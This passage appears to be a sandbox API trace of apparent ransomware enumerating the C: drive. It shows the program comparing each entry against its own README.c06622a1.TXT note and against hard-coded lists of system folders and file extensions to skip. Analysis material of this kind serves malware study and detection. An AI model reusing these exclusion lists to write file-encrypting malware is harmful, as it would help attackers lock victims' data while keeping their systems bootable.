nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0136.340] _wcsicmp (_Str1="$recycle.bin", _Str2="Config.Msi") returned -63 [0136.340] wcslen (_String="$recycle.bin") returned 0xc [0136.340] _wcsicmp (_Str1="config.msi", _Str2="Config.Msi") returned 0 [0136.340] FindNextFileW (in: hFindFile=0x4faec0, lpFindFileData=0x3ff46c | out: lpFindFileData=0x3ff46c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0136.340] FindNextFileW (in: hFindFile=0x4faec0, lpFindFileData=0x3ff46c | out: lpFindFileData=0x3ff46c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0136.340] _wcsicmp (_Str1="hiberfil.sys", _Str2="README.c06622a1.TXT") returned -10 [0136.340] wcsstr (_Str="hiberfil.sys", _SubStr="README") returned 0x0 [0136.340] _wcsicmp (_Str1="autorun.inf", _Str2="hiberfil.sys") returned -7 [0136.340] wcslen (_String="autorun.inf") returned 0xb [0136.340] _wcsicmp (_Str1="boot.ini", _Str2="hiberfil.sys") returned -6 [0136.340] wcslen (_String="boot.ini") returned 0x8 [0136.340] _wcsicmp (_Str1="bootfont.bin", _Str2="hiberfil.sys") returned -6 [0136.340] wcslen (_String="bootfont.bin") returned 0xc [0136.340] _wcsicmp (_Str1="bootsect.bak", _Str2="hiberfil.sys") returned -6 [0136.340] wcslen (_String="bootsect.bak") returned 0xc [0136.340] _wcsicmp (_Str1="desktop.ini", _Str2="hiberfil.sys") returned -4 [0136.340] wcslen (_String="desktop.ini") returned 0xb [0136.340] _wcsicmp (_Str1="iconcache.db", _Str2="hiberfil.sys") returned 1 [0136.340] wcslen (_String="iconcache.db") returned 0xc [0136.340] _wcsicmp (_Str1="ntldr", _Str2="hiberfil.sys") returned 6 [0136.340] wcslen (_String="ntldr") returned 0x5 [0136.340] _wcsicmp (_Str1="ntuser.dat", _Str2="hiberfil.sys") returned 6 [0136.340] wcslen (_String="ntuser.dat") returned 0xa [0136.340] _wcsicmp (_Str1="ntuser.dat.log", _Str2="hiberfil.sys") returned 6 [0136.340] wcslen (_String="ntuser.dat.log") returned 0xe [0136.340] _wcsicmp (_Str1="ntuser.ini", _Str2="hiberfil.sys") returned 6 [0136.340] wcslen (_String="ntuser.ini") returned 0xa [0136.340] _wcsicmp (_Str1="thumbs.db", _Str2="hiberfil.sys") returned 12 [0136.340] wcslen (_String="thumbs.db") returned 0x9 [0136.341] _wcsicmp (_Str1="386", _Str2="sys") returned -64 [0136.341] wcslen (_String="386") returned 0x3 [0136.341] _wcsicmp (_Str1="adv", _Str2="sys") returned -18 [0136.341] wcslen (_String="adv") returned 0x3 [0136.341] _wcsicmp (_Str1="ani", _Str2="sys") returned -18 [0136.341] wcslen (_String="ani") returned 0x3 [0136.341] _wcsicmp (_Str1="bat", _Str2="sys") returned -17 [0136.341] wcslen (_String="bat") returned 0x3 [0136.341] _wcsicmp (_Str1="bin", _Str2="sys") returned -17 [0136.341] wcslen (_String="bin") returned 0x3 [0136.341] _wcsicmp (_Str1="cab", _Str2="sys") returned -16 [0136.341] wcslen (_String="cab") returned 0x3 [0136.341] _wcsicmp (_Str1="cmd", _Str2="sys") returned -16 [0136.341] wcslen (_String="cmd") returned 0x3 [0136.341] _wcsicmp (_Str1="com", _Str2="sys") returned -16 [0136.341] wcslen (_String="com") returned 0x3 [0136.341] _wcsicmp (_Str1="cpl", _Str2="sys") returned -16 [0136.341] wcslen (_String="cpl") returned 0x3 [0136.341] _wcsicmp (_Str1="cur", _Str2="sys") returned -16 [0136.341] wcslen (_String="cur") returned 0x3 [0136.341] _wcsicmp (_Str1="deskthemepack", _Str2="sys") returned -15 [0136.341] wcslen (_String="deskthemepack") returned 0xd [0136.341] _wcsicmp (_Str1="diagcab", _Str2="sys") returned -15 [0136.341] wcslen (_String="diagcab") returned 0x7 [0136.341] _wcsicmp (_Str1="diagcfg", _Str2="sys") returned -15 [0136.341] wcslen (_String="diagcfg") returned 0x7 [0136.341] _wcsicmp (_Str1="diagpkg", _Str2="sys") returned -15 [0136.341] wcslen (_String="diagpkg") returned 0x7 [0136.341] _wcsicmp (_Str1="dll", _Str2="sys") returned -15 [0136.341] wcslen (_String="dll") returned 0x3 [0136.341] _wcsicmp (_Str1="drv", _Str2="sys") returned -15 [0136.341] wcslen (_String="drv") returned 0x3 [0136.341] _wcsicmp (_Str1="exe", _Str2="sys") returned -14 [0136.342] wcslen (_String="exe") returned 0x3 [0136.342] _wcsicmp (_Str1="hlp", _Str2="sys") returned -11 [0136.342] wcslen (_String="hlp") returned 0x3 [0136.342] _wcsicmp (_Str1="icl", _Str2="sys") returned -10 [0136.342] wcslen (_String="icl") returned 0x3 [0136.342] _wcsicmp (_Str1="icns", _Str2="sys") returned -10 [0136.342] wcslen (_String="icns") returned 0x4 [0136.342] _wcsicmp (_Str1="ico", _Str2="sys") returned -10 [0136.342] wcslen (_String="ico") returned 0x3 [0136.342] _wcsicmp (_Str1="ics", _Str2="sys") returned -10 [0136.342] wcslen (_String="ics") returned 0x3 [0136.342] _wcsicmp (_Str1="idx", _Str2="sys") returned -10 [0136.342] wcslen (_String="idx") returned 0x3 [0136.342] _wcsicmp (_Str1="ldf", _Str2="sys") returned -7 [0136.342] wcslen (_String="ldf") returned 0x3 [0136.342] _wcsicmp (_Str1="lnk", _Str2="sys") returned -7 [0136.342] wcslen (_String="lnk") returned 0x3 [0136.342] _wcsicmp (_Str1="mod", _Str2="sys") returned -6 [0136.342] wcslen (_String="mod") returned 0x3 [0136.342] _wcsicmp (_Str1="mpa", _Str2="sys") returned -6 [0136.342] wcslen (_String="mpa") returned 0x3 [0136.342] _wcsicmp (_Str1="msc", _Str2="sys") returned -6 [0136.342] wcslen (_String="msc") returned 0x3 [0136.342] _wcsicmp (_Str1="msp", _Str2="sys") returned -6 [0136.342] wcslen (_String="msp") returned 0x3 [0136.342] _wcsicmp (_Str1="msstyles", _Str2="sys") returned -6 [0136.342] wcslen (_String="msstyles") returned 0x8 [0136.342] _wcsicmp (_Str1="msu", _Str2="sys") returned -6 [0136.342] wcslen (_String="msu") returned 0x3 [0136.342] _wcsicmp (_Str1="nls", _Str2="sys") returned -5 [0136.342] wcslen (_String="nls") returned 0x3 [0136.342] _wcsicmp (_Str1="nomedia", _Str2="sys") returned -5 [0136.342] wcslen (_String="nomedia") returned 0x7 [0136.342] _wcsicmp (_Str1="ocx", _Str2="sys") returned -4 [0136.342] wcslen (_String="ocx") returned 0x3 [0136.342] _wcsicmp (_Str1="prf", _Str2="sys") returned -3 [0136.342] wcslen (_String="prf") returned 0x3 [0136.343] _wcsicmp (_Str1="ps1", _Str2="sys") returned -3 [0136.343] wcslen (_String="ps1") returned 0x3 [0136.343] _wcsicmp (_Str1="rom", _Str2="sys") returned -1 [0136.343] wcslen (_String="rom") returned 0x3 [0136.343] _wcsicmp (_Str1="rtp", _Str2="sys") returned -1 [0136.343] wcslen (_String="rtp") returned 0x3 [0136.343] _wcsicmp (_Str1="scr", _Str2="sys") returned -22 [0136.343] wcslen (_String="scr") returned 0x3 [0136.343] _wcsicmp (_Str1="shs", _Str2="sys") returned -17 [0136.343] wcslen (_String="shs") returned 0x3 [0136.343] _wcsicmp (_Str1="spl", _Str2="sys") returned -9 [0136.343] wcslen (_String="spl") returned 0x3 [0136.343] _wcsicmp (_Str1="sys", _Str2="sys") returned 0 [0136.343] FindNextFileW (in: hFindFile=0x4faec0, lpFindFileData=0x3ff46c | out: lpFindFileData=0x3ff46c*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0136.343] _wcsicmp (_Str1="$recycle.bin", _Str2="MSOCache") returned -73 [0136.343] wcslen (_String="$recycle.bin") returned 0xc [0136.343] _wcsicmp (_Str1="config.msi", _Str2="MSOCache") returned -10 [0136.343] wcslen (_String="config.msi") returned 0xa [0136.343] _wcsicmp (_Str1="$windows.~bt", _Str2="MSOCache") returned -73 [0136.343] wcslen (_String="$windows.~bt") returned 0xc [0136.343] _wcsicmp (_Str1="$windows.~ws", _Str2="MSOCache") returned -73 [0136.343] wcslen (_String="$windows.~ws") returned 0xc [0136.343] _wcsicmp (_Str1="windows", _Str2="MSOCache") returned 10 [0136.343] wcslen (_String="windows") returned 0x7 [0136.343] _wcsicmp (_Str1="appdata", _Str2="MSOCache") returned -12 [0136.343] wcslen (_String="appdata") returned 0x7 [0136.343] _wcsicmp (_Str1="application data", _Str2="MSOCache") returned -12 [0136.343] wcslen (_String="application data") returned 0x10 [0136.343] _wcsicmp (_Str1="boot", _Str2="MSOCache") returned -11 [0136.343] wcslen (_String="boot") returned 0x4 [0136.343] _wcsicmp (_Str1="google", _Str2="MSOCache") returned -6 [0136.343] wcslen (_String="google") returned 0x6 [0136.343] _wcsicmp (_Str1="mozilla", _Str2="MSOCache") returned -4 [0136.343] wcslen (_String="mozilla") returned 0x7 [0136.343] _wcsicmp (_Str1="program files", _Str2="MSOCache") returned 3 [0136.343] wcslen (_String="program files") returned 0xd [0136.343] _wcsicmp (_Str1="program files (x86)", _Str2="MSOCache") returned 3 [0136.344] wcslen (_String="program files (x86)") returned 0x13 [0136.344] _wcsicmp (_Str1="programdata", _Str2="MSOCache") returned 3 [0136.344] wcslen (_String="programdata") returned 0xb [0136.344] _wcsicmp (_Str1="system volume information", _Str2="MSOCache") returned 6 [0136.344] wcslen (_String="system volume information") returned 0x19 [0136.344] _wcsicmp (_Str1="tor browser", _Str2="MSOCache") returned 7 [0136.344] wcslen (_String="tor browser") returned 0xb [0136.344] _wcsicmp (_Str1="windows.old", _Str2="MSOCache") returned 10 [0136.344] wcslen (_String="windows.old") returned 0xb [0136.344] _wcsicmp (_Str1="intel", _Str2="MSOCache") returned -4 [0136.344] wcslen (_String="intel") returned 0x5 [0136.344] _wcsicmp (_Str1="msocache", _Str2="MSOCache") returned 0 [0136.344] FindNextFileW (in: hFindFile=0x4faec0, lpFindFileData=0x3ff46c | out: lpFindFileData=0x3ff46c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xaece4da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0136.344] _wcsicmp (_Str1="pagefile.sys", _Str2="README.c06622a1.TXT") returned -2 [0136.344] wcsstr (_Str="pagefile.sys", _SubStr="README") returned 0x0 [0136.344] _wcsicmp (_Str1="autorun.inf", _Str2="pagefile.sys") returned -15 [0136.344] wcslen (_String="autorun.inf") returned 0xb [0136.344] _wcsicmp (_Str1="boot.ini", _Str2="pagefile.sys") returned -14 [0136.344] wcslen (_String="boot.ini") returned 0x8 [0136.344] _wcsicmp (_Str1="bootfont.bin", _Str2="pagefile.sys") returned -14 [0136.344] wcslen (_String="bootfont.bin") returned 0xc [0136.344] _wcsicmp (_Str1="bootsect.bak", _Str2="pagefile.sys") returned -14 [0136.344] wcslen (_String="bootsect.bak") returned 0xc [0136.344] _wcsicmp (_Str1="desktop.ini", _Str2="pagefile.sys") returned -12 [0136.344] wcslen (_String="desktop.ini") returned 0xb [0136.344] _wcsicmp (_Str1="iconcache.db", _Str2="pagefile.sys") returned -7 [0136.344] wcslen (_String="iconcache.db") returned 0xc [0136.344] _wcsicmp (_Str1="ntldr", _Str2="pagefile.sys") returned -2 [0136.344] wcslen (_String="ntldr") returned 0x5 [0136.344] _wcsicmp (_Str1="ntuser.dat", _Str2="pagefile.sys") returned -2 [0136.344] wcslen (_String="ntuser.dat") returned 0xa [0136.344] _wcsicmp (_Str1="ntuser.dat.log", _Str2="pagefile.sys") returned -2 [0136.344] wcslen (_String="ntuser.dat.log") returned 0xe [0136.344] _wcsicmp (_Str1="ntuser.ini", _Str2="pagefile.sys") returned -2 [0136.344] wcslen (_String="ntuser.ini") returned 0xa [0136.344] _wcsicmp (_Str1="thumbs.db", _Str2="pagefile.sys") returned 4 [0136.344] wcslen (_String="thumbs.db") returned 0x9 [0136.345] _wcsicmp (_Str1="386", _Str2="sys") returned -64 [0136.345] wcslen (_String="386") returned 0x3 [0136.345] _wcsicmp (_Str1="adv", _Str2="sys") returned -18 [0136.345] wcslen (_String="adv") returned 0x3 [0136.345] _wcsicmp (_Str1="ani", _Str2="sys") returned -18 [0136.345] wcslen (_String="ani") returned 0x3 [0136.345] _wcsicmp (_Str1="bat", _Str2="sys") returned -17 [0136.345] wcslen (_String="bat") returned 0x3 [0136.345] _wcsicmp (_Str1="bin", _Str2="sys") returned -17 [0136.345] wcslen (_String="bin") returned 0x3 [0136.345] _wcsicmp (_Str1="cab", _Str2="sys") returned -16 [0136.345] wcslen (_String="cab") returned 0x3 [0136.345] _wcsicmp (_Str1="cmd", _Str2="sys") returned -16 [0136.345] wcslen (_String="cmd") returned 0x3 [0136.345] _wcsicmp (_Str1="com", _Str2="sys") returned -16 [0136.345] wcslen (_String="com") returned 0x3 [0136.345] _wcsicmp (_Str1="cpl", _Str2="sys") returned -16 [0136.345] wcslen (_String="cpl") returned 0x3 [0136.345] _wcsicmp (_Str1="cur", _Str2="sys") returned -16 [0136.345] wcslen (_String="cur") returned 0x3 [0136.345] _wcsicmp (_Str1="deskthemepack", _Str2="sys") returned -15 [0136.345] wcslen (_String="deskthemepack") returned 0xd [0136.345] _wcsicmp (_Str1="diagcab", _Str2="sys") returned -15 [0136.345] wcslen (_String="diagcab") returned 0x7 [0136.345] _wcsicmp (_Str1="diagcfg", _Str2="sys") returned -15 [0136.345] wcslen (_String="diagcfg") returned 0x7 [0136.345] _wcsicmp (_Str1="diagpkg", _Str2="sys") returned -15 [0136.345] wcslen (_String="diagpkg") returned 0x7 [0136.345] _wcsicmp (_Str1="dll", _Str2="sys") returned -15 [0136.345] wcslen (_String="dll") returned 0x3 [0136.345] _wcsicmp (_Str1="drv", _Str2="sys") returned -15 [0136.345] wcslen (_String="drv") returned 0x3 [0136.345] _wcsicmp (_Str1="exe", _Str2="sys") returned -14 [0136.345] wcslen (_String="exe") returned 0x3 [0136.345] _wcsicmp (_Str1="hlp", _Str2="sys") returned -11 [0136.345] wcslen (_String="hlp") returned 0x3 [0136.345] _wcsicmp (_Str1="icl", _Str2="sys") returned -10 [0136.346] wcslen (_String="icl") returned 0x3 [0136.346] _wcsicmp (_Str1="icns", _Str2="sys") returned -10 [0136.346] wcslen (_String="icns") returned 0x4 [0136.346] _wcsicmp (_Str1="ico", _Str2="sys") returned -10 [0136.346] wcslen (_String="ico") returned 0x3 [0136.346] _wcsicmp (_Str1="ics", _Str2="sys") returned -10 [0136.346] wcslen (_String="ics") returned 0x3 [0136.346] _wcsicmp (_Str1="idx", _Str2="sys") returned -10 [0136.346] wcslen (_String="idx") returned 0x3 [0136.346] _wcsicmp (_Str1="ldf", _Str2="sys") returned -7 [0136.346] wcslen (_String="ldf") returned 0x3 [0136.346] _wcsicmp (_Str1="lnk", _Str2="sys") returned -7 [0136.346] wcslen (_String="lnk") returned 0x3 [0136.346] _wcsicmp (_Str1="mod", _Str2="sys") returned -6 [0136.346] wcslen (_String="mod") returned 0x3 [0136.346] _wcsicmp (_Str1="mpa", _Str2="sys") returned -6 [0136.346] wcslen (_String="mpa") returned 0x3 [0136.346] _wcsicmp (_Str1="msc", _Str2="sys") returned -6 [0136.346] wcslen (_String="msc") returned 0x3 [0136.346] _wcsicmp (_Str1="msp", _Str2="sys") returned -6 [0136.346] wcslen (_String="msp") returned 0x3 [0136.346] _wcsicmp (_Str1="msstyles", _Str2="sys") returned -6 [0136.346] wcslen (_String="msstyles") returned 0x8 [0136.346] _wcsicmp (_Str1="msu", _Str2="sys") returned -6 [0136.346] wcslen (_String="msu") returned 0x3 [0136.346] _wcsicmp (_Str1="nls", _Str2="sys") returned -5 [0136.346] wcslen (_String="nls") returned 0x3 [0136.346] _wcsicmp (_Str1="nomedia", _Str2="sys") returned -5 [0136.346] wcslen (_String="nomedia") returned 0x7 [0136.346] _wcsicmp (_Str1="ocx", _Str2="sys") returned -4 [0136.346] wcslen (_String="ocx") returned 0x3 [0136.346] _wcsicmp (_Str1="prf", _Str2="sys") returned -3 [0136.346] wcslen (_String="prf") returned 0x3 [0136.346] _wcsicmp (_Str1="ps1", _Str2="sys") returned -3 [0136.346] wcslen (_String="ps1") returned 0x3 [0136.346] _wcsicmp (_Str1="rom", _Str2="sys") returned -1 [0136.346] wcslen (_String="rom") returned 0x3 [0136.346] _wcsicmp (_Str1="rtp", _Str2="sys") returned -1 [0136.346] wcslen (_String="rtp") returned 0x3 [0136.347] _wcsicmp (_Str1="scr", _Str2="sys") returned -22 [0136.347] wcslen (_String="scr") returned 0x3 [0136.347] _wcsicmp (_Str1="shs", _Str2="sys") returned -17 [0136.347] wcslen (_String="shs") returned 0x3 [0136.347] _wcsicmp (_Str1="spl", _Str2="sys") returned -9 [0136.347] wcslen (_String="spl") returned 0x3 [0136.347] _wcsicmp (_Str1="sys", _Str2="sys") returned 0 [0136.347] FindNextFileW (in: hFindFile=0x4faec0, lpFindFileData=0x3ff46c | out: lpFindFileData=0x3ff46c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0136.347] _wcsicmp (_Str1="$recycle.bin", _Str2="PerfLogs") returned -76 [0136.347] wcslen (_String="$recycle.bin") returned 0xc [0136.347] _wcsicmp (_Str1="config.msi", _Str2="PerfLogs") returned -13 [0136.347] wcslen (_String="config.msi") returned 0xa [0136.347] _wcsicmp (_Str1="$windows.~bt", _Str2="PerfLogs") returned -76 [0136.347] wcslen (_String="$windows.~bt") returned 0xc [0136.347] _wcsicmp (_Str1="$windows.~ws", _Str2="PerfLogs") returned -76 [0136.347] wcslen (_String="$windows.~ws") returned 0xc [0136.347] _wcsicmp (_Str1="windows", _Str2="PerfLogs") returned 7 [0136.347] wcslen (_String="windows") returned 0x7 [0136.347] _wcsicmp (_Str1="appdata", _Str2="PerfLogs") returned -15 [0136.347] wcslen (_String="appdata") returned 0x7 [0136.347] _wcsicmp (_Str1="application data", _Str2="PerfLogs") returned -15 [0136.347] wcslen (_String="application data") returned 0x10 [0136.347] _wcsicmp (_Str1="boot", _Str2="PerfLogs") returned -14 [0136.347] wcslen (_String="boot") returned 0x4 [0136.347] _wcsicmp (_Str1="google", _Str2="PerfLogs") returned -9 [0136.347] wcslen (_String="google") returned 0x6 [0136.347] _wcsicmp (_Str1="mozilla", _Str2="PerfLogs") returned -3 [0136.347] wcslen (_String="mozilla") returned 0x7 [0136.347] _wcsicmp (_Str1="program files", _Str2="PerfLogs") returned 13 [0136.347] wcslen (_String="program files") returned 0xd [0136.347] _wcsicmp (_Str1="program files (x86)", _Str2="PerfLogs") returned 13 [0136.347] wcslen (_String="program files (x86)") returned 0x13 [0136.347] _wcsicmp (_Str1="programdata", _Str2="PerfLogs") returned 13 [0136.347] wcslen (_String="programdata") returned 0xb [0136.347] _wcsicmp (_Str1="system volume information", _Str2="PerfLogs") returned 3 [0136.347] wcslen (_String="system volume information") returned 0x19 [0136.347] _wcsicmp (_Str1="tor browser", _Str2="PerfLogs") returned 4 [0136.348] wcslen (_String="tor browser") returned 0xb [0136.348] _wcsicmp (_Str1="windows.old", _Str2="PerfLogs") returned 7 [0136.348] wcslen (_String="windows.old") returned 0xb [0136.348] _wcsicmp (_Str1="intel", _Str2="PerfLogs") returned -7 [0136.348] wcslen (_String="intel") returned 0x5 [0136.348] _wcsicmp (_Str1="msocache", _Str2="PerfLogs") returned -3 [0136.348] wcslen (_String="msocache") returned 0x8 [0136.348] _wcsicmp (_Str1="perflogs", _Str2="PerfLogs") returned 0 [0136.348] FindNextFileW (in: hFindFile=0x4faec0, lpFindFileData=0x3ff46c | out: lpFindFileData=0x3ff46c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xebbafba0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xebbafba0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0136.348] _wcsicmp (_Str1="$recycle.bin", _Str2="Program Files") returned -76 [0136.348] wcslen (_String="$recycle.bin") returned 0xc [0136.348] _wcsicmp (_Str1="config.msi", _Str2="Program Files") returned -13 [0136.348] wcslen (_String="config.msi") returned 0xa [0136.348] _wcsicmp (_Str1="$windows.~bt", _Str2="Program Files") returned -76 [0136.348] wcslen (_String="$windows.~bt") returned 0xc [0136.348] _wcsicmp (_Str1="$windows.~ws", _Str2="Program Files") returned -76 [0136.348] wcslen (_String="$windows.~ws") returned 0xc [0136.348] _wcsicmp (_Str1="windows", _Str2="Program Files") returned 7 [0136.348] wcslen (_String="windows") returned 0x7 [0136.348] _wcsicmp (_Str1="appdata", _Str2="Program Files") returned -15 [0136.348] wcslen (_String="appdata") returned 0x7 [0136.348] _wcsicmp (_Str1="application data", _Str2="Program Files") returned -15 [0136.348] wcslen (_String="application data") returned 0x10 [0136.348] _wcsicmp (_Str1="boot", _Str2="Program Files") returned -14 [0136.348] wcslen (_String="boot") returned 0x4 [0136.348] _wcsicmp (_Str1="google", _Str2="Program Files") returned -9 [0136.348] wcslen (_String="google") returned 0x6 [0136.348] _wcsicmp (_Str1="mozilla", _Str2="Program Files") returned -3 [0136.348] wcslen (_String="mozilla") returned 0x7 [0136.348] _wcsicmp (_Str1="program files", _Str2="Program Files") returned 0 [0136.348] FindNextFileW (in: hFindFile=0x4faec0, lpFindFileData=0x3ff46c | out: lpFindFileData=0x3ff46c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0136.348] _wcsicmp (_Str1="$recycle.bin", _Str2="Program Files (x86)") returned -76 [0136.348] wcslen (_String="$recycle.bin") returned 0xc [0136.348] _wcsicmp (_Str1="config.msi", _Str2="Program Files (x86)") returned -13 [0136.348] wcslen (_String="config.msi") returned 0xa [0136.348] _wcsicmp (_Str1="$windows.~bt", _Str2="Program Files (x86)") returned -76 [0136.348] wcslen (_String="$windows.~bt") returned 0xc [0136.349] _wcsicmp (_Str1="$windows.~ws", _Str2="Program Files (x86)") returned -76 [0136.349] wcslen (_String="$windows.~ws") returned 0xc [0136.349] _wcsicmp (_Str1="windows", _Str2="Program Files (x86)") returned 7 [0136.349] wcslen (_String="windows") returned 0x7 [0136.349] _wcsicmp (_Str1="appdata", _Str2="Program Files (x86)") returned -15 [0136.349] wcslen (_String="appdata") returned 0x7 [0136.349] _wcsicmp (_Str1="application data", _Str2="Program Files (x86)") returned -15 [0136.349] wcslen (_String="application data") returned 0x10 [0136.349] _wcsicmp (_Str1="boot", _Str2="Program Files (x86)") returned -14 [0136.349] wcslen (_String="boot") returned 0x4 [0136.349] _wcsicmp (_Str1="google", _Str2="Program Files (x86)") returned -9 [0136.349] wcslen (_String="google") returned 0x6 [0136.349] _wcsicmp (_Str1="mozilla", _Str2="Program Files (x86)") returned -3 [0136.349] wcslen (_String="mozilla") returned 0x7 [0136.349] _wcsicmp (_Str1="program files", _Str2="Program Files (x86)") returned -32 [0136.349] wcslen (_String="program files") returned 0xd [0136.349] _wcsicmp (_Str1="program files (x86)", _Str2="Program Files (x86)") returned 0 [0136.349] FindNextFileW (in: hFindFile=0x4faec0, lpFindFileData=0x3ff46c | out: lpFindFileData=0x3ff46c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0136.349] _wcsicmp (_Str1="$recycle.bin", _Str2="ProgramData") returned -76 [0136.349] wcslen (_String="$recycle.bin") returned 0xc [0136.349] _wcsicmp (_Str1="config.msi", _Str2="ProgramData") returned -13 [0136.349] wcslen (_String="config.msi") returned 0xa [0136.349] _wcsicmp (_Str1="$windows.~bt", _Str2="ProgramData") returned -76 [0136.349] wcslen (_String="$windows.~bt") returned 0xc [0136.349] _wcsicmp (_Str1="$windows.~ws", _Str2="ProgramData") returned -76 [0136.349] wcslen (_String="$windows.~ws") returned 0xc [0136.349] _wcsicmp (_Str1="windows", _Str2="ProgramData") returned 7 [0136.349] wcslen (_String="windows") returned 0x7 [0136.349] _wcsicmp (_Str1="appdata", _Str2="ProgramData") returned -15 [0136.349] wcslen (_String="appdata") returned 0x7 [0136.349] _wcsicmp (_Str1="application data", _Str2="ProgramData") returned -15 [0136.349] wcslen (_String="application data") returned 0x10 [0136.349] _wcsicmp (_Str1="boot", _Str2="ProgramData") returned -14 [0136.349] wcslen (_String="boot") returned 0x4 [0136.349] _wcsicmp (_Str1="google", _Str2="ProgramData") returned -9 [0136.349] wcslen (_String="google") returned 0x6 [0136.350] _wcsicmp (_Str1="mozilla", _Str2="ProgramData") returned -3 [0136.350] wcslen (_String="mozilla") returned 0x7 [0136.350] _wcsicmp (_Str1="program files", _Str2="ProgramData") returned -68 [0136.350] wcslen (_String="program files") returned 0xd [0136.350] _wcsicmp (_Str1="program files (x86)", _Str2="ProgramData") returned -68 [0136.350] wcslen (_String="program files (x86)") returned 0x13 [0136.350] _wcsicmp (_Str1="programdata", _Str2="ProgramData") returned 0 [0136.350] FindNextFileW (in: hFindFile=0x4faec0, lpFindFileData=0x3ff46c | out: lpFindFileData=0x3ff46c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfe7bb20, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xcfe7bb20, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xcfe7bb20, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0136.350] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0136.350] FindNextFileW (in: hFindFile=0x4faec0, lpFindFileData=0x3ff46c | out: lpFindFileData=0x3ff46c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0136.350] _wcsicmp (_Str1="$recycle.bin", _Str2="Recovery") returned -78 [0136.350] wcslen (_String="$recycle.bin") returned 0xc [0136.350] _wcsicmp (_Str1="config.msi", _Str2="Recovery") returned -15 [0136.350] wcslen (_String="config.msi") returned 0xa 